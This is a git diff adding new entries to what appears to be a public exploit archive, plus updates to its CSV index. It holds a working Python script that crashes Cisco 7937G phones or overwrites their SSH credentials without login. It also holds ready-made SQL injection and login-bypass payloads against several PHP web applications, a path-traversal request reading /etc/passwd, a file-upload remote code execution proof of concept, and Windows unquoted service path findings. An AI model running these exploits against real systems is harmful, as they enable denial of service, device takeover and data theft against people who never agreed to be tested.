diff --git a/exploits/hardware/remote/49057.py b/exploits/hardware/remote/49057.py new file mode 100755 index 000000000..e1fa44aef --- /dev/null +++ b/exploits/hardware/remote/49057.py @@ -0,0 +1,177 @@ +# Exploit Title: Cisco 7937G 1-4-5-7 - DoS/Privilege Escalation +# Date: 2020-08-10 +# Exploit Author: Cody Martin +# Vendor Homepage: https://cisco.com +# Version: <=SIP-1-4-5-7 +# Tested On: SIP-1-4-5-5, SIP-1-4-5-7 +#!/usr/bin/python + +import sys +import getopt +import requests +import paramiko +import socket +import os + + +def main(argv): + target = "" + attack = "" + username = "" + password = "" + divider = "==================== +========================== +=" + + help_text = ''' +exploit.py -t/--target ip-address-of-target -a/--attack attack-type [-u/--u= +ser username -p/--password password] +%s +Example: exploit.py -t 192.168.1.200 -a 1 +Example: exploit.py --target 192.168.1.200 --attack 3 --user bob --password= + villa +%s +Attack types: +1: DoS with automatic device reset +2: DoS without automatic device reset +3: Change SSH credentials of target device +''' % (divider, divider) + + if len(sys.argv) == 1: + print(help_text) + sys.exit(2) + try: + opts, args = getopt.getopt(argv, "ht:a:u:p:", ["help", "target== +", "attack=", "user=", "password="]) + except getopt.GetoptError: + print(help_text) + sys.exit(2) + for opt, arg in opts: + if opt == "-h": + print(help_text) + sys.exit() + elif opt in ("-t", "--target"): + target = arg + elif opt in ("-a", "--attack"): + attack = arg + elif opt in ("-u", "--user"): + username = arg + elif opt in ("-p", "--password"): + password = arg + + if username != "" and password != "" and attack == "3": + print("Starting SSH attack!") + print(divider) + print("Target: ", target, "\nAttack: ", attack, "\nUser: ", usernam= +e, "\nPassword: ", password) + finished = attack_ssh(target, username, password) + elif attack == "1": + print("Starting DoS reset attack!") + print(divider) + print("Target: ", target, "\nAttack: ", attack) + finished = dos_one(target) + elif attack == "2": + print("Starting DoS non-reset attack!") + print(divider) + print("Target: ", target, "\nAttack: ", attack) + finished = dos_two(target) + + print(divider) + + if finished == 1: + print("DoS reset attack completed!") + elif finished == 2: + print("DoS non-reset attack completed!") + print("Device must be power cycled to restore functionality.") + elif finished == 3: + tell = "SSH attack finished!\nTry to login using the supplied cre= +dentials %s:%s" % (username, password) + connection_example = "ssh -oKexAlgorithms=+diffie-hellman-group= +1-sha1 %s@%s" % (username, target) + print(tell) + print("You must specify the key exchange when connecting or the dev= +ice will be DoS'd!") + print(connection_example) + elif finished == 0: + print("Something strange happened. Attack likely unsuccessful.") + sys.exit() + + +def dos_one(target): + url = "http://%s/localmenus.cgi" % target + data = "A"*46 + payload = {"func": "609", "data": data, "rphl": "1"} + print("FIRING ZE MIZZLES!") + for i in range(1000): + try: + r = requests.post(url=url, params=payload, timeout=5) + if r.status_code != 200: + print("Device doesn't appear to be functioning or web acces= +s is not enabled.") + sys.exit() + except requests.exceptions.RequestException: + return 1 + + return 0 + + +def dos_two(target): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(15) + try: + sock.connect((target, 22)) + except OSError: + print("Device doesn't appear to be functioning (already DoS'd?) or = +SSH is not enabled.") + sys.exit() + + transport = paramiko.Transport(sock=sock, disabled_algorithms={"k= +ex": ["diffie-hellman-group-exchange-sha1", + = +"diffie-hellman-group14-sha1", + = +"diffie-hellman-group1-sha1"]}) + + fd = os.open("/dev/null", os.O_WRONLY) + savefd = os.dup(2) + os.dup2(fd, 2) + + try: + transport.connect(username="notreal", password="notreal") + except (paramiko.ssh_exception.SSHException, OSError, paramiko.SSHExcep= +tion): + os.dup2(savefd, 2) + return 2 + + return 0 + + +def attack_ssh(target, username, password): + url = "http://%s/localmenus.cgi" % target + payload_user = {"func": "403", "set": "401", "name1": username, "name= +2": username} + payload_pass = {"func": "403", "set": "402", "pwd1": password, "pwd2"= +: password} + print("FIRING ZE MIZZLES!") + try: + r = requests.post(url=url, params=payload_user, timeout=5) + if r.status_code != 200: + print("Device doesn't appear to be functioning or web access is= + not enabled.") + sys.exit() + + r = requests.post(url=url, params=payload_pass, timeout=5) + if r.status_code != 200: + print("Device doesn't appear to be functioning or web access is= + not enabled.") + sys.exit() + except requests.exceptions.RequestException: + print("Device doesn't appear to be functioning or web access is not= + enabled.") + sys.exit() + + return 3 + + +if __name__ == "__main__": + main(sys.argv[1:]) \ No newline at end of file diff --git a/exploits/php/webapps/49046.txt b/exploits/php/webapps/49046.txt new file mode 100644 index 000000000..d6de76906 --- /dev/null +++ b/exploits/php/webapps/49046.txt @@ -0,0 +1,32 @@ +# Exploit Title: Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated) +# Date: 11-14-2020 +# Exploit Author: Matthew Aberegg, Alex Prieto +# Vendor Homepage: https://pandorafms.com/ +# Patch Link: https://github.com/pandorafms/pandorafms/commit/1258a1a63535f60924fb69b1f7812c678570cc8e +# Software Link: https://pandorafms.com/community/get-started/ +# Version: Pandora FMS 7.0 NG 749 +# Tested on: Ubuntu 18.04 + + +# Vulnerability Details +# Description : A blind SQL injection vulnerability exists in the "CG Items" functionality of Pandora FMS. +# Vulnerable Parameter : data + + +# POC + +POST /pandora_console/ajax.php?data=(SELECT+1+FROM+(SELECT(SLEEP(5)))A) HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 23 +Origin: http://TARGET +Connection: close +Referer: http://TARGET/pandora_console/index.php?sec=eventos&sec2=operation/events/events +Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3 + +page=general%2Fcg_items \ No newline at end of file diff --git a/exploits/php/webapps/49048.txt b/exploits/php/webapps/49048.txt new file mode 100644 index 000000000..22b8874b7 --- /dev/null +++ b/exploits/php/webapps/49048.txt @@ -0,0 +1,37 @@ +# Exploit Title: Water Billing System 1.0 - 'id' SQL Injection (Authenticated) +# Date: 2020-11-14 +# Exploit Author: Mehmet Kelepçe / Gais Cyber Security +# Author ID: 8763 +# Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html +# Version: 1.0 +# Tested on: Apache2 and Windows 10 + +Vulnerable param: id +------------------------------------------------------------------------- +GET /WBS/edituser.php?id=-9%27+UNION+SELECT+1,@@VERSION,3,4--%20- HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 +Accept: */* +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Referer: http://localhost/WBS/user.php +Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean + + + + +------------------------------------------------------------------------- + +Source Code: edituser.php + +.. +.. +.. +$user_id =$_REQUEST['id']; +$result = mysqli_query($conn,"SELECT * FROM user WHERE id = '$user_id'"); +.. +.. + +------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/49051.txt b/exploits/php/webapps/49051.txt new file mode 100644 index 000000000..b7a8f4fab --- /dev/null +++ b/exploits/php/webapps/49051.txt @@ -0,0 +1,38 @@ +# Exploit Title: Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated) +# Date: 2020-11-14 +# Exploit Author: Mehmet Kelepçe / Gais Cyber Security +# Author ID: 8763 +# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Apache2 and Windows 10 + +Vulnerable param: id +------------------------------------------------------------------------- +GET /WBS/viewbill.php?id=2%27+union+select+1,2,3,@@version,5,6--+- HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 163 +Origin: http://localhost +Connection: close +Cookie: COOKIE +Upgrade-Insecure-Requests: 1 + + +------------------------------------------------------------------------- + +Source Code: \WBS\viewbill.php + +.. +.. +.. +$id =$_REQUEST['id']; +$result = mysqli_query($conn,"SELECT * FROM bill where owners_id='$id'"); +.. +.. + +------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/49052.txt b/exploits/php/webapps/49052.txt new file mode 100644 index 000000000..1085596b6 --- /dev/null +++ b/exploits/php/webapps/49052.txt @@ -0,0 +1,29 @@ +# Exploit Title: User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection +# Date: 2020–11–14 +# Exploit Author: Mayur Parmar(th3cyb3rc0p) +# Vendor Homepage: https://phpgurukul.com +# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/ +# Version: 2.1 +# Tested on POPOs(Linux) + +SQL Injection: +SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data. + +Attack Vector: +An attacker can gain admin panel access using malicious sql injection quiries. + +Steps to reproduce: +1. Open admin login page using following URl: +-> http://localhost/loginsystem/admin/ + +2. Now put below Payload in both the fields( User ID & Password) +Payload: ' or '1'='1 + +3. Server accepted our payload and we bypassed admin panel without any credentials, + +IMPACT: +if any attacker can gain admin panel access than they can Update & Delete Userdata + +Suggested Mitigation/Remediation Actions +Parameterized queries should be used to separate the command and data portions of the intended query to the database. These queries prevent an attacker from tampering with the query logic and extending a concatenated database query string. Code reviews should be conducted to identify any additional areas were the application or other applications in the organization are vulnerable to this attack. +Additionally, input validation should be enforced on the server side in order to ensure that only expected data is sent in queries. Where possible security specific libraries should be used in order to provide an additional layer of protection. \ No newline at end of file diff --git a/exploits/php/webapps/49054.txt b/exploits/php/webapps/49054.txt new file mode 100644 index 000000000..014360023 --- /dev/null +++ b/exploits/php/webapps/49054.txt @@ -0,0 +1,23 @@ +# Exploit Title: PMB 5.6 - 'chemin' Local File Disclosure +# Date: 2020-10-13 +# Google Dork: inurl:opac_css +# Exploit Author: 41-trk (Tarik Bakir) +# Vendor Homepage: http://www.sigb.net +# Software Link: http://forge.sigb.net/redmine/projects/pmb/files +# Affected versions : <= 5.6 +# Tested on: Ubuntu 18.04.1 + +The PMB Gif Image is not sanitizing the 'chemin', +which leads to Local File Disclosure. + +As of today (2020-10-13) this issue is unfixed. + +Vulnerable code: (getgif.php ) + +line 55 $fp2=@fopen($chemin, "rb"); +line 68 fpassthru($fp) + + +========================= Proof-of-Concept =================================================== + + http://127.0.0.1:2121/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik \ No newline at end of file diff --git a/exploits/php/webapps/49055.txt b/exploits/php/webapps/49055.txt new file mode 100644 index 000000000..2a8589a68 --- /dev/null +++ b/exploits/php/webapps/49055.txt @@ -0,0 +1,65 @@ +# Exploit Title: Car Rental Management System 1.0 - Remote Code Execution (Authenticated) +# Date: 2020-11.13 +# Exploit Author: Mehmet Kelepçe / Gais Cyber Security +# Author ID: 8763 +# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Apache2 - Windows 10 + +Vulnerable param: img +------------------------------------------------------------------------- +POST /car_rental/admin/ajax.php?action=save_settings HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 +Accept: */* +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------30709612614161811513297969444 +Content-Length: 777 +Origin: http://localhost +Connection: close +Referer: http://localhost/car_rental/admin/index.php?page=site_settings +Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean + +-----------------------------30709612614161811513297969444 +Content-Disposition: form-data; name="name" + +Car Rental Management System +-----------------------------30709612614161811513297969444 +Content-Disposition: form-data; name="email" + +info@sample.comm +-----------------------------30709612614161811513297969444 +Content-Disposition: form-data; name="contact" + ++6948 8542 623 +-----------------------------30709612614161811513297969444 +Content-Disposition: form-data; name="about" + +content + +-----------------------------30709612614161811513297969444 +Content-Disposition: form-data; name="img"; filename="k.php" +Content-Type: application/octet-stream + + +-----------------------------30709612614161811513297969444-- + + +Source Code: + +admin\admin_class.php: +-------------------------------------------------------------------- + if($_FILES['img']['tmp_name'] != ''){ + $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name']; + $move = move_uploaded_file($_FILES['img']['tmp_name'],'assets/uploads/'. $fname); + $data .= ", avatar = '$fname' "; + + } + +-------------------------------------------------------------------- + +POC: +http://{site]/admin/assets/uploads/{FILE}.php?k=whoami \ No newline at end of file diff --git a/exploits/php/webapps/49056.txt b/exploits/php/webapps/49056.txt new file mode 100644 index 000000000..e8f3d6e3f --- /dev/null +++ b/exploits/php/webapps/49056.txt @@ -0,0 +1,32 @@ +# Exploit Title: Car Rental Management System 1.0 - 'car_id' Sql Injection +# Date: 2020-11.13 +# Exploit Author: Mehmet Kelepçe / Gais Cyber Security +# Author ID: 8763 +# Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Apache2 - Windows 10 + +Vulnerable param: car_id +------------------------------------------------------------------------- +GET /car_rental/booking.php?car_id=1+UNION+ALL+SELECT+1,@@VERSION,3,4,5,6,7,8,9,10# HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: setting=k; PHPSESSID=tsimparo2crmq2ibibnla5vean +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 + + +Source Code: + +booking.php: +-------------------------------------------------------------------- +query("SELECT * FROM cars where id= ".$_GET['car_id']); +foreach($qry->fetch_array() as $k => $val){ + $$k=$val; +} \ No newline at end of file diff --git a/exploits/windows/local/49047.txt b/exploits/windows/local/49047.txt new file mode 100644 index 000000000..f05c75aa0 --- /dev/null +++ b/exploits/windows/local/49047.txt @@ -0,0 +1,33 @@ +# Exploit Title: KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path +# Discovery by: IRVIN GIL +# Discovery Date: 2020-11-14 +# Vendor Homepage: https://www.kite.com/ +# Tested Version: 1.2020.1113.1 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 x64 es + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ + +KiteService KiteService C:\Program Files\Kite\KiteService.exe Auto + +# Service info: + +C:\>sc qc "KiteService" +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: KiteService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 0 IGNORE + NOMBRE_RUTA_BINARIO: C:\Program Files\Kite\KiteService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : KiteService + DEPENDENCIAS : + NOMBRE_INICIO_SERVICIO: LocalSystem + +#Exploit: + +A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/49049.txt b/exploits/windows/local/49049.txt new file mode 100644 index 000000000..d1b00b05b --- /dev/null +++ b/exploits/windows/local/49049.txt @@ -0,0 +1,35 @@ +# Title: Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path +# Author: Jair Amezcua +# Date: 2020-11-10 +# Vendor Homepage: https://www.iobit.com +# Software Link: https://www.iobit.com/es/advancedsystemcarepro.php +# Version : 13.0.0.157 +# Tested on: Windows 10 64bit(EN) +# CVE : N/A + +# 1. Description: +# Unquoted service paths in Advanced System Care Service 13 v13.0.0.157 have an unquoted service path. + +# PoC +=========== + +C:\>sc qc AdvancedSystemCareService13 +[SC] QueryServiceConfig SUCCESS +SERVICE_NAME: AdvancedSystemCareService13 + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Advanced SystemCare Pro\ASCService.exe + LOAD_ORDER_GROUP : System Reserved + TAG : 0 + DISPLAY_NAME : Advanced SystemCare Service 13 + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + + +#Description Exploit: +# A successful attempt would require the local user to be able to insert their code in the system root path +# undetected by the OS or other security applications where it could potentially be executed during +# application startup or reboot. If successful, the local user's code would execute with the elevated +# privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/49050.txt b/exploits/windows/local/49050.txt new file mode 100644 index 000000000..71db3367c --- /dev/null +++ b/exploits/windows/local/49050.txt @@ -0,0 +1,34 @@ +# Title: Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path +# Author: Jair Amezcua +# Date: 2020-11-10 +# Vendor Homepage: https://www.logitech.com/es-mx +# Software Link: https://support.logi.com/hc/en-us/articles/360024692874--Downloads-Wireless-Solar-Keyboard-K750 +# Version : 1.10.3.0 +# Tested on: Windows 10 64bit(EN) +# CVE : N/A + +# 1. Description: +# Unquoted service paths in Logitech Solar Keyboard Service v1.10.3.0 have an unquoted service path. + +# PoC +=========== + +C:\>sc qc L4301_Solar +[SC] QueryServiceConfig SUCCESS +SERVICE_NAME: L4301_Solar + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files\Logitech\SolarApp\L4301_Solar.exe + LOAD_ORDER_GROUP : PlugPlay + TAG : 0 + DISPLAY_NAME : Logitech Solar Keyboard Service + DEPENDENCIES : PlugPlay + SERVICE_START_NAME : LocalSystem + + +#Description Exploit: +# A successful attempt would require the local user to be able to insert their code in the system root path +# undetected by the OS or other security applications where it could potentially be executed during +# application startup or reboot. If successful, the local user's code would execute with the elevated +# privileges of the application. \ No newline at end of file diff --git a/exploits/windows/local/49053.txt b/exploits/windows/local/49053.txt new file mode 100644 index 000000000..5f241c29c --- /dev/null +++ b/exploits/windows/local/49053.txt @@ -0,0 +1,30 @@ +#Exploit Title: Atheros Coex Service Application 8.0.0.255 -'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path +#Exploit Author : Isabel Lopez +#Exploit Date: 2020-11-13 +#Vendor Homepage : https://www.file.net/process/ath_coexagent.exe.html +#Link Software : https://www.boostbyreason.com/resource-file-9102-ath_coexagent-exe.aspx +#Tested on OS: Windows 8.1 (64bits) + + +# 1. Description +# Atheros Coex Service Application 8.0.0.255 has an unquoted service path. + +# 2. PoC + +C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /V "C:\Windows" | findstr /i /V """" + +ZAtheros Bt&Wlan Coex Agent ZAtheros Bt&Wlan Coex Agent C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe Auto + +C:\>sc qc WCAssistantService +[SC] QueryServiceConfig SUCCES + +SERVICE_NAME: WCAssistantService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\Bluethooth Suite\Aht_CoexAgent.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : ZAtheros Bt&Wlan Coex Agent + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 0c34c8ee8..5c84751a0 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10424,6 +10424,10 @@ id,file,description,date,author,type,platform,port 49041,exploits/windows/local/49041.txt,"DigitalPersona 5.1.0.656 'DpHostW' - Unquoted Service Path",2020-11-13,"Teresa Q",local,windows, 49042,exploits/windows/local/49042.txt,"SAntivirus IC 10.0.21.61 - 'SAntivirusIC' Unquoted Service Path",2020-11-13,"Mara Ramirez",local,windows, 49043,exploits/windows/local/49043.txt,"IDT PC Audio 1.0.6425.0 - 'STacSV' Unquoted Service Path",2020-11-13,"Isabel Lopez",local,windows, +49047,exploits/windows/local/49047.txt,"KiteService 1.2020.1113.1 - 'KiteService.exe' Unquoted Service Path",2020-11-16,"IRVIN GIL",local,windows, +49049,exploits/windows/local/49049.txt,"Advanced System Care Service 13 - 'AdvancedSystemCareService13' Unquoted Service Path",2020-11-16,"Jair Amezcua",local,windows, +49050,exploits/windows/local/49050.txt,"Logitech Solar Keyboard Service - 'L4301_Solar' Unquoted Service Path",2020-11-16,"Jair Amezcua",local,windows, +49053,exploits/windows/local/49053.txt,"Atheros Coex Service Application 8.0.0.255 - 'ZAtheros Bt&Wlan Coex Agent' Unquoted Service Path",2020-11-16,"Isabel Lopez",local,windows, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, @@ -17864,6 +17868,7 @@ id,file,description,date,author,type,platform,port 48954,exploits/hardware/remote/48954.txt,"Adtec Digital Multiple Products - Default Hardcoded Credentials Remote Root",2020-10-27,LiquidWorm,remote,hardware, 48958,exploits/hardware/remote/48958.py,"GoAhead Web Server 5.1.1 - Digest Authentication Capture Replay Nonce Reuse",2020-10-27,LiquidWorm,remote,hardware, 48994,exploits/hardware/remote/48994.py,"TP-Link WDR4300 - Remote Code Execution (Authenticated)",2020-11-05,"Patrik Lantz",remote,hardware, +49057,exploits/hardware/remote/49057.py,"Cisco 7937G - DoS/Privilege Escalation",2020-11-16,"Cody Martin",remote,hardware, 42806,exploits/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution",2017-09-27,SlidingWindow,remote,java, 42888,exploits/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",remote,hardware, 42891,exploits/windows/remote/42891.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution",2017-09-28,hyp3rlinx,remote,windows, @@ -40861,6 +40866,13 @@ id,file,description,date,author,type,platform,port 49040,exploits/multiple/webapps/49040.txt,"Touchbase.io 1.10 - Stored Cross Site Scripting",2020-11-13,"Simran Sankhala",webapps,multiple, 49044,exploits/php/webapps/49044.txt,"OpenCart Theme Journal 3.1.0 - Sensitive Data Exposure",2020-11-13,"Jinson Varghese Behanan",webapps,php, 49045,exploits/php/webapps/49045.sh,"October CMS Build 465 - Arbitrary File Read Exploit (Authenticated)",2020-11-13,"Sivanesh Ashok",webapps,php, +49046,exploits/php/webapps/49046.txt,"Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated)",2020-11-16,"Matthew Aberegg",webapps,php, +49048,exploits/php/webapps/49048.txt,"Water Billing System 1.0 - 'id' SQL Injection (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php, +49051,exploits/php/webapps/49051.txt,"Car Rental Management System 1.0 - 'id' SQL Injection (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php, +49052,exploits/php/webapps/49052.txt,"User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection",2020-11-16,"Mayur Parmar",webapps,php, +49054,exploits/php/webapps/49054.txt,"PMB 5.6 - 'chemin' Local File Disclosure",2020-11-16,41-trk,webapps,php, +49055,exploits/php/webapps/49055.txt,"Car Rental Management System 1.0 - Remote Code Execution (Authenticated)",2020-11-16,"Mehmet Kelepçe",webapps,php, +49056,exploits/php/webapps/49056.txt,"Car Rental Management System 1.0 - 'car_id' Sql Injection",2020-11-16,"Mehmet Kelepçe",webapps,php, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,